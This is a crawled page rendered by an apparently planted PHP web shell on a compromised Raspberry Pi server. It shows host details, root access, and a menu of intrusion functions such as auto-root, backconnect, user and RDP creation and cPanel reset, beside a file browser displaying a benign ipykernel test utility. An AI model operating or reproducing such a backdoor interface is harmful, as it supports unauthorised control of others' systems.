Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
ipykernel /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
998
B
-rw-r--r--
_asyncio.py
363
B
-rw-r--r--
test_connect.py
1.92
KB
-rw-r--r--
test_embed_kernel.py
4.53
KB
-rw-r--r--
test_eventloop.py
971
B
-rw-r--r--
test_io.py
1.06
KB
-rw-r--r--
test_jsonutil.py
3.18
KB
-rw-r--r--
test_kernel.py
9.38
KB
-rw-r--r--
test_kernelspec.py
3.63
KB
-rw-r--r--
test_message_spec.py
14.27
KB
-rw-r--r--
test_pickleutil.py
1.17
KB
-rw-r--r--
test_serialize.py
5.44
KB
-rw-r--r--
test_start_kernel.py
1.73
KB
-rw-r--r--
test_zmq_shell.py
5.75
KB
-rw-r--r--
utils.py
4.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : utils.py
"""utilities for testing IPython kernels""" # Copyright (c) IPython Development Team. # Distributed under the terms of the Modified BSD License. from __future__ import print_function import atexit import os import sys from contextlib import contextmanager from subprocess import PIPE, STDOUT try: from queue import Empty # Py 3 except ImportError: from Queue import Empty # Py 2 import nose from jupyter_client import manager STARTUP_TIMEOUT = 60 TIMEOUT = 15 KM = None KC = None def start_new_kernel(**kwargs): """start a new kernel, and return its Manager and Client Integrates with our output capturing for tests. """ try: stdout = nose.iptest_stdstreams_fileno() except AttributeError: stdout = open(os.devnull) kwargs.update(dict(stdout=stdout, stderr=STDOUT)) return manager.start_new_kernel(startup_timeout=STARTUP_TIMEOUT, **kwargs) def flush_channels(kc=None): """flush any messages waiting on the queue""" from .test_message_spec import validate_message if kc is None: kc = KC for channel in (kc.shell_channel, kc.iopub_channel): while True: try: msg = channel.get_msg(block=True, timeout=0.1) except Empty: break else: validate_message(msg) def execute(code='', kc=None, **kwargs): """wrapper for doing common steps for validating an execution request""" from .test_message_spec import validate_message if kc is None: kc = KC msg_id = kc.execute(code=code, **kwargs) reply = kc.get_shell_msg(timeout=TIMEOUT) validate_message(reply, 'execute_reply', msg_id) busy = kc.get_iopub_msg(timeout=TIMEOUT) validate_message(busy, 'status', msg_id) assert busy['content']['execution_state'] == 'busy' if not kwargs.get('silent'): execute_input = kc.get_iopub_msg(timeout=TIMEOUT) validate_message(execute_input, 'execute_input', msg_id) assert execute_input['content']['code'] == code # show tracebacks if present for debugging if reply['content'].get('traceback'): print('\n'.join(reply['content']['traceback']), file=sys.stderr) return msg_id, reply['content'] def start_global_kernel(): """start the global kernel (if it isn't running) and return its client""" global KM, KC if KM is None: KM, KC = start_new_kernel() atexit.register(stop_global_kernel) else: flush_channels(KC) return KC @contextmanager def kernel(): """Context manager for the global kernel instance Should be used for most kernel tests Returns ------- kernel_client: connected KernelClient instance """ yield start_global_kernel() def uses_kernel(test_f): """Decorator for tests that use the global kernel""" def wrapped_test(): with kernel() as kc: test_f(kc) wrapped_test.__doc__ = test_f.__doc__ wrapped_test.__name__ = test_f.__name__ return wrapped_test def stop_global_kernel(): """Stop the global shared kernel instance, if it exists""" global KM, KC KC.stop_channels() KC = None if KM is None: return KM.shutdown_kernel(now=True) KM = None def new_kernel(argv=None): """Context manager for a new kernel in a subprocess Should only be used for tests where the kernel must not be re-used. Returns ------- kernel_client: connected KernelClient instance """ stdout = getattr(nose, 'iptest_stdstreams_fileno', open(os.devnull)) kwargs = dict(stdout=stdout, stderr=STDOUT) if argv is not None: kwargs['extra_arguments'] = argv return manager.run_kernel(**kwargs) def assemble_output(iopub): """assemble stdout/err from an execution""" stdout = '' stderr = '' while True: msg = iopub.get_msg(block=True, timeout=1) msg_type = msg['msg_type'] content = msg['content'] if msg_type == 'status' and content['execution_state'] == 'idle': # idle message signals end of output break elif msg['msg_type'] == 'stream': if content['name'] == 'stdout': stdout += content['text'] elif content['name'] == 'stderr': stderr += content['text'] else: raise KeyError("bad stream: %r" % content['name']) else: # other output, ignored pass return stdout, stderr def wait_for_idle(kc): while True: msg = kc.iopub_channel.get_msg(block=True, timeout=1) msg_type = msg['msg_type'] content = msg['content'] if msg_type == 'status' and content['execution_state'] == 'idle': break
Close